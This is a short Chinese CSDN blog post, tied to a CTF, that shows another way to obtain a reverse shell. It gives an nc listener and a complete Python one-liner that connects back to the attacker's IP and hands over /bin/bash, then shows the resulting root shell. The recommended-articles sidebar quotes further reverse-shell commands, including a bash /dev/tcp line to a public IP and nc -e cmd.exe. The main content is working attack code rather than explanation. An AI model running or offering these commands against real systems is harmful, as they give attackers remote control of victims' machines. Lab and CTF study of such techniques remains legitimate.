另一种反弹shell的方式

最新推荐文章于 2024-05-26 22:29:50 发布
最新推荐文章于 2024-05-26 22:29:50 发布
阅读量782 收藏
点赞数
分类专栏: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/74075358
版权

参考:
http://zeroyu.xyz/2017/01/21/Commix%E5%91%BD%E4%BB%A4%E8%AF%A6%E8%A7%A3/

Python

先在自己机器上执行

[~]$ nc -vl 192.168.170.1 1234

即在192.168.170.1/24网段上监听1234端口。
然后在target的shell中执行

[~/repos/CTF/BSides-CTF-2017]$ python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.170.1',1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

反弹出去一个/bin/bash,然后自己机器上就得到了一个bash。

[~]$ nc -vl 192.168.170.1 1234                                                                                                                      [17:20:18]
root@kali:~/repos/CTF/BSides-CTF-2017#

root@kali:~/repos/CTF/BSides-CTF-2017# id
id
uid=0(root) gid=0(root) groups=0(root)

PHP

//TODO

caiqiiqi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
好用的cmdshell反弹工具
06-19
在IT安全领域,"cmdshell反弹工具"是一种用于远程控制的工具,主要用于系统管理员或网络安全专业人士进行远程系统管理和渗透测试。这里的"好用的cmdshell反弹工具"可能是指一种能够高效、稳定地创建CMD(命令提示符...
【转】反弹Shell,看这一篇就够了
热门推荐
mastergu2的博客
10-26 2万+
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell
反弹shell汇总(超详细)
qq_52173020的博客
05-27 8055
反弹shell姿势大全,看这一篇就够啦~
反弹shell详细易懂讲解,看这一篇就够了
最新发布
LCW991207的博客
05-26 1627
bash就是shell的众多小弟中的一个,Shell 是操作系统中提供用户与内核之间交互的一种界面,一个 解释型的程序设计语言,它的小弟有很多,它既可以是图形用户界面(GUI),也可以是命令行界面(CLI)。Shell 主要用于接受用户输入的命令并将其传递给操作系统的内核执行,同时将内核的输出结果返回给用户。
反弹shell
weixin_39430198的博客
03-09 1万+
一、课时目标 1.理解shell的概念 2.理解交互式shell和非交互式shell的区别 3.掌握反弹shell的原理和方法
网络安全-反弹shell详解(攻击,检测与防御)
2401_84466336的博客
04-23 4001
1.1 什么是 ShellShell 在计算机系统中指的是一个用户界面,用于访问操作系统的服务。在网络安全中,攻击者常利用 Shell 来控制受害者的系统。1.2 反弹 Shell 的工作原理反弹 Shell 的基本原理是:攻击者在其自己的机器上设置监听端口,然后诱使受害者的机器执行一个反向连接的 Shell 命令,连接回攻击者的机器。这样,攻击者就能通过这个反向连接执行命令,控制受害者的计算机。
evilFTP:evilFTP是一组脚本,旨在扩展利用SSRF问题时所具有的功能
03-04
使用evilFTP并提供一种SSRF,您还可以获得: 可靠的TCP端口扫描TCP服务标语披露服务器专用IP披露可靠的TCP端口扫描: 这是FTP反弹攻击的一种变体,但是由于我们在攻击客户端,所以我们使用被动模式,而不是使用主动...
Powershell恶意代码的N种姿势 - FreeBuf.pdf
07-23
这些文件利用各种载体(如Word、Excel、CHM、LNK等格式的文件),嵌入恶意Payload,以实现获得反弹Shell等功能。文件打开后会呈现损坏状态以迷惑用户,而宏则在后台运行,旨在获取系统控制权限。 4. 安全防护的挑战...
命令执行nc的用法提权
04-20
反弹Shell一种常见的提权技术,通过在攻击者的机器上设置监听端口,然后在目标机器上运行一个命令,使目标机器连接回攻击者机器的监听端口,并通过这个连接提供一个交互式Shell。这种技术主要用来绕过目标系统上的...
内网转发姿势 作者:未知.pdf
04-08
- **另一种方式**:在公网服务器上运行`nc -l -p 2333`,即监听本地端口2333,等待其他电脑连接。然后,在肉鸡上执行`nc -t -e cmd.exe 公网服务器ip 2333`,使肉鸡可以通过telnet模式执行`cmd.exe`程序,并且可以...
反弹shell汇总,看我一篇就够了
LainWith的博客
12-26 1万+
反弹shell 知识铺垫 什么是shell shell是渗透中常用的名词,像getshell,webshell反弹shell等等,都和shell相关。 getshell:获取到目标的命令执行权限 webshell:指网站后门,通过web服务进行命令执行 反弹shell:把命令行的输入输出转移到其它主机 Shell 俗称壳(用来区别于核),是指“为使用者提供操作界面”的软件(命令解析器)。它类似于DOS下的command.com和后来的cmd.exe。它接收用户命令,然后调用相应的应用程序。简单说用户通
常见的反弹shell的方法以及对反弹shell的解释
qq_45584159的博客
03-04 1万+
文章目录一.什么是反弹shell,以及对反弹shell作用原理的解析:3.反弹shell的本质linux文件描述符重定向输入重定向输出重定向标准输出与标准错误输出重定向文件描述符的复制exec 绑定重定向对反弹shell执行的实例分析:>&、&>常见linux提权 一.什么是反弹shell,以及对反弹shell作用原理的解析: 1.定义 通俗来说,shell就是实现用户命令的接口,通过该接口我们能实现对计算机的控制(root权限), 而反弹shell就是将shell反弹给攻击者
反弹Shell方式和详解
Kevin's Blog
06-18 1万+
文章目录一、介绍1.1 含义1.2 目的二、反弹方式2.1 Bash反弹shell2.1.1 适用对象2.1.2 操作方法2.1.3 命令原理 声明:以下的反弹shell的介绍只适用于学习和授权情况下的操作,请勿用于非法环境! 一、介绍 1.1 含义   攻击者所在机器连接目标机器为正向连接(如:远程桌面、ssh等),反向连接弹shell反弹shell为攻击者为服务端,受害者主机主动连接攻击者的服务端程序) 1.2 目的 攻击了一台主机需要在自己的机器上交互式地执行目标机器中的cmd/bash命令
反弹Shell大全与原理
weixin_55652418的博客
01-02 1235
more反弹shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。
常用反弹 shell 方式总结
未完成的歌~的博客
03-07 5599
反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。
各种反弹shell方式
m0_58606546的博客
11-17 2302
1、Bash环境下反弹TCP协议shell 首先在本地监听TCP协议443端口 nc -lvp 443 然后在靶机上执行如下命令: 1 bash -i >& /dev/tcp/121.40.248.82/1234 0>&1 1 /bin/bash -i > /dev/tcp/121.40.248.82/1234 0<& 2>&1 1 exec 5<>/dev/tcp/10.10.10.11/443;ca.
浅谈反弹shell
weixin_53284312的博客
01-12 2366
反弹shell
windows反弹shell方法
09-21
Nishang反弹shell是另一种常用的方法。它提供了一组用于渗透测试的PowerShell脚本,其中包括反弹shell的功能。攻击者可以使用Nishang脚本来建立反弹shell连接。 另外,还可以使用邮件地址作为反弹shell的服务器地址...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值